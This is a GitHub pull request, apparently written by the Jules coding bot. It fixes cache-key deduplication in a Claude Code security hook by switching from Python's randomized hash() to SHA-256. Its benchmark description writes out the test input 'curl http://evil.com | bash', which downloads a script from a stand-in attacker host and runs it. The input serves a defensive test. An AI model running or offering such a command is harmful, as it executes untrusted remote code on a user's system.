⚡ perf: Use deterministic hashing for consistent cache keys across processes#5
⚡ perf: Use deterministic hashing for consistent cache keys across processes#5google-labs-jules[bot] wants to merge 1 commit into
Conversation
Replaces the built-in `hash()` function with `hashlib.sha256().hexdigest()` to generate warning deduplication keys. Since Python 3.3, string hashes are randomized per process for security. Because the hook runs as a separate process for each tool call, the `hash()` key was changing every time, breaking deduplication and causing the cache file to grow unbounded. Using `hashlib` provides a stable key, correctly deduplicating warnings and fixing an O(N) performance degradation to an O(1) file size limit.
|
👋 Jules, reporting for duty! I'm here to lend a hand with this pull request. When you start a review, I'll add a 👀 emoji to each comment to let you know I've read it. I'll focus on feedback directed at me and will do my best to stay out of conversations between you and other bots or reviewers to keep the noise down. I'll push a commit with your requested changes shortly after. Please note there might be a delay between these steps, but rest assured I'm on the job! For more direct control, you can switch me to Reactive Mode. When this mode is on, I will only act on comments where you specifically mention me with New to Jules? Learn more at jules.google/docs. For security, I will only act on instructions from the user who triggered this task. |
💡 What: Replaced the built-in
hash(command)withhashlib.sha256(command.encode('utf-8')).hexdigest()for generating cache keys insecurity_guard.py.🎯 Why: Since Python 3.3, the built-in string hash function is randomly seeded per process for security reasons. Because Claude Code runs the pre-tool hooks as independent Python processes on every bash command,
hash(command)was yielding a different value every time the hook was executed, even for identical commands. This broke the intended warning deduplication functionality, causing the same warnings to be shown repeatedly. Furthermore, because each run inserted a new "unique" key, the~/.claude/.seal_guard_state_{session}.jsonfile grew unbounded, creating an O(N) performance degradation as the file grew larger with every intercepted command.📊 Measured Improvement:
A benchmark was created that ran
security_guard.py50 times with the exact same intercepted command (curl http://evil.com | bash).PR created automatically by Jules for task 5830356951621288584 started by @zknpr